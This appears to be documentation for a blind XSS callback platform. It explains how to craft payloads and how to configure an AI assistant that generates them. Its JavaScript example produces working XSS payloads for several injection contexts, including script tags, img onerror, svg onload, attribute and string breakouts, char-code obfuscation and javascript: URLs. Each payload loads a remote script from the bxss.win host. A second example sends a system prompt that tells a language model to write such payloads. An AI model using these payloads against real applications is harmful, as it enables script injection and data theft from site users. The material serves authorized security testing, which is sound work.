
Crafting Payload

Things to keep in mind:

  1. Your payload must load its script from https://bxss.win/{username} (your personal callback URL). A payload that fires but never fetches that URL will not register a hit in your dashboard.
  2. You must craft the payload so that the script from that URL actually executes in the target application. Plain injection is not enough: the payload has to break out of whatever HTML, attribute or JavaScript context the input lands in before it can load the script.
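The following is an added example, not one of the platform's predefined payloads or code from the bxss.win documentation. It generates blind XSS payload variants for the injection contexts a tester commonly meets (body, filtered `<script>`, quoted attribute, JavaScript string, quote-free sink, URL sink), every one of which loads the script from https://bxss.win/{username} as rule 1 requires. The function names, the `CALLBACK_HOST` constant and the username check are this example's own assumptions.

```javascript
// Added example (not bxss.win's own code): build blind XSS payloads that all
// load https://bxss.win/<username>, one per injection context.

const CALLBACK_HOST = "https://bxss.win/"; // assumed constant for this example

// Build the callback URL, refusing usernames that could break the URL or the
// surrounding quoting (assumed restriction for this example).
function callbackUrl(username) {
  if (!/^[A-Za-z0-9_-]+$/.test(username)) {
    throw new Error("username must be URL-safe: " + username);
  }
  return CALLBACK_HOST + username;
}

// Express a string as String.fromCharCode(...) so the result contains no
// quotes, slashes or dots; useful where those characters are filtered.
function fromCharCode(str) {
  const codes = Array.from(str).map((c) => c.charCodeAt(0)).join(",");
  return `String.fromCharCode(${codes})`;
}

// JavaScript that injects a <script> element pointing at the callback URL.
// This is what event-handler payloads run when <script> tags are filtered.
function loaderJs(username) {
  const url = callbackUrl(username);
  return `var s=document.createElement('script');s.src='${url}';document.body.appendChild(s)`;
}

// One payload per context, keyed by where the injected input lands.
function buildPayloads(username) {
  const url = callbackUrl(username);
  const js = loaderJs(username);
  return {
    // Input reflected straight into the HTML body
    html_script: `<script src="${url}"></script>`,
    // HTML body, but <script> is stripped: handler on a broken image
    html_img: `<img src=x onerror="${js}">`,
    // HTML body, SVG onload fires without any user interaction
    html_svg: `<svg onload="${js}">`,
    // Inside a double-quoted attribute: close it, add a handler, reopen
    attr_double: `" autofocus onfocus="${js}" x="`,
    // Inside a single-quoted JavaScript string literal
    js_string_single: `';${js};//`,
    // JavaScript sink that rejects quotes: URL and tag name via char codes
    js_no_quotes:
      `var s=document.createElement(${fromCharCode("script")});` +
      `s.src=${fromCharCode(url)};document.body.appendChild(s)`,
    // href/src sinks that accept a javascript: URL
    url_scheme: `javascript:${js}`,
  };
}

// Check rule 1: the payload references the callback URL, literally or as
// character codes.
function referencesCallback(payload, username) {
  const url = callbackUrl(username);
  return payload.includes(url) || payload.includes(fromCharCode(url));
}

// Return every payload for a username, confirming each satisfies rule 1.
function checkedPayloads(username) {
  const payloads = buildPayloads(username);
  for (const [ctx, p] of Object.entries(payloads)) {
    if (!referencesCallback(p, username)) {
      throw new Error(`payload ${ctx} does not load the callback URL`);
    }
  }
  return payloads;
}
```

Call `checkedPayloads("yourname")` and paste the variant that matches the context you found; if the application HTML-encodes quotes, `js_no_quotes` is the one to try in a JavaScript sink. Whichever variant you use, a hit in the dashboard is the only confirmation that the script actually ran.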

Using Predefined Payloads

We provide predefined payloads for common blind XSS vectors, already pointed at your https://bxss.win/{username} URL. You can find them in the Payloads section of your dashboard.

Using AI to craft your payloads

We also offer an AI assistant that can help you craft payloads for a specific context. You can find it in the same Payloads section of your dashboard, under the AI Assistant tab.

Configuring AI Assistant

  1. Go to the Payloads section of your dashboard.
  2. Click on the AI Assistant tab.
  3. Click on the Configure AI button at the top right.
  4. Enter the API Endpoint URL, API Key, and Model Name. The default API Endpoint URL is https://api.openai.com/v1/chat/completions and the default Model Name is gpt-4.1. Any endpoint that speaks the same chat-completions request format can be used here.
  5. You may also add additional HTTP headers if your API requires them.
  6. You can also change the system prompt that guides the AI by clicking on the Advanced: Edit System Prompt link.
  7. Click on the Save Configuration button.

Note: The AI assistant configuration is stored in your browser's local storage, and all API requests are sent directly from your browser to the endpoint you configured. Our servers never see your API key or your prompts. Because the key lives in local storage, it is readable by anything with access to that browser profile, so use a scoped, revocable key and clear the configuration before handing over a shared machine.
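To make the browser-side flow concrete, here is an added example (not the dashboard's own code) that maps the configuration fields above onto the request the browser would send: endpoint URL, API key as a bearer token, model name, extra headers, and the system prompt placed ahead of the user prompt in a chat-completions body. The `config` object shape, the function names and the default system prompt text are assumptions of this example.

```javascript
// Added example (not bxss.win's own code): build the chat-completions request
// a browser-side assistant would send with the settings from the Configure AI
// dialog. Nothing here touches the network; sendPrompt() is where fetch() goes.

// Assumed shape of the saved configuration (mirrors the dialog fields).
const DEFAULT_CONFIG = {
  endpoint: "https://api.openai.com/v1/chat/completions",
  apiKey: "",
  model: "gpt-4.1",
  extraHeaders: {},
  systemPrompt:
    "You write blind XSS payloads. Every payload must load its script from " +
    "https://bxss.win/{username}. Return only the payload.",
};

// Resolve the {username} placeholder so the model is told the real URL.
function renderSystemPrompt(template, username) {
  return template.replace(/\{username\}/g, username);
}

// Assemble the URL and fetch() init for one prompt.
function buildChatRequest(config, username, userPrompt) {
  const cfg = { ...DEFAULT_CONFIG, ...config };
  if (!cfg.apiKey) throw new Error("API key is required");
  if (!/^https:\/\//.test(cfg.endpoint)) throw new Error("endpoint must be https");
  const headers = {
    "Content-Type": "application/json",
    Authorization: `Bearer ${cfg.apiKey}`,
    ...cfg.extraHeaders, // e.g. an organisation or project header
  };
  const body = {
    model: cfg.model,
    messages: [
      { role: "system", content: renderSystemPrompt(cfg.systemPrompt, username) },
      { role: "user", content: userPrompt },
    ],
  };
  return { url: cfg.endpoint, init: { method: "POST", headers, body: JSON.stringify(body) } };
}

// Pull the assistant text out of a chat-completions response object.
function extractReply(responseJson) {
  const choice = responseJson && responseJson.choices && responseJson.choices[0];
  if (!choice || !choice.message) throw new Error("unexpected response shape");
  return choice.message.content;
}

// Sanity check before accepting a generated payload: it must reference the
// caller's callback URL (rule 1 on this page).
function mentionsCallback(payload, username) {
  return payload.includes("https://bxss.win/" + username);
}

// Browser entry point; not exercised offline.
async function sendPrompt(config, username, userPrompt) {
  const { url, init } = buildChatRequest(config, username, userPrompt);
  const res = await fetch(url, init);
  if (!res.ok) throw new Error(`API returned ${res.status}`);
  const reply = extractReply(await res.json());
  if (!mentionsCallback(reply, username)) {
    throw new Error("model reply does not load the callback URL");
  }
  return reply;
}
```

The final check in `sendPrompt` matters in practice: a model will happily return a payload that points somewhere else or drops the URL entirely, and such a payload will never produce a hit in your dashboard.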

Using AI Assistant

In the prompt box, describe the context or constraint you are working with (e.g., "I need the payload with an img tag" or "I need a payload that doesn't use the script tag"). The AI generates a tailored blind XSS payload that loads the script from your bxss.win URL (https://bxss.win/{username}). Before using it, confirm the generated payload actually references that URL and fits the context you found; the model can produce syntactically valid payloads that never call home.